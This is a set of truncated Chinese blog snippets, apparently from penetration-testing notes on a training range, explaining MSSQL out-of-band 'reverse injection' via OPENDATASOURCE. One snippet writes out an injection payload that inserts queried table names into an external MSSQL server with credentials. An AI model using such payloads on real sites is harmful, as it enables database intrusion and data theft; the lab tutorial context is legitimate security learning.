技术标签:zkaq靶场sqlsql注入mssql渗透测试 MSSQL反弹注入 SQL注入回顾:网络安全笔记-99-渗透-SQL注入 使用场景 明明是SQL注入点,但是使用工具注入缓慢,或者错误提示信息关闭,无法返回注入结果等。较好的解决办法就是使用反弹注入。 核心 反弹注入的核心就是opendatasouce()函数。 将查询的数据结果插入到我们
利用opendatasource函数,把查询出来的数据发送到准备好的MSSQL服务器上 查询语句 # 查询系统自带表中xtype='U'的name,id并插入到我们准备好的temp表http://o9pz8015.ia.aqlab.cn/?id=1';insert into opendatasource('sqloledb','server=SQL5095.site4now.net,1433;uid=DB_14DC274_abcd_admin;pwd=123456.co...
利用数据外带的方式来进行注入,就是将数据库的插入的自己的数据库里 但是首先你要有公网ip和mssql服务器 可以去香港云(http://www.webweb.com/)注册,60天免费 这里利用opendatasource()函数 语法: OPENDATASOURCE(provider_name,init_string) provider_name 注册为用于访问数据源的OLE DB 提供程序的PROGID的名称 MS...
用id=2' 进行测试,发现报错,显示 odbc_exec() :xxxx 的错误,说明用的是MSSQL数据库: image.png 这里确实是存在注入点的,但用了几个测试语句都无法注入,也没有什么有价值的回显。所以这里就用上了反弹注入。 反弹注入就是利用SQL SERVER的opendatasource() 函数,来将查询结果发送到另一个外网服务器的SQL SERVE...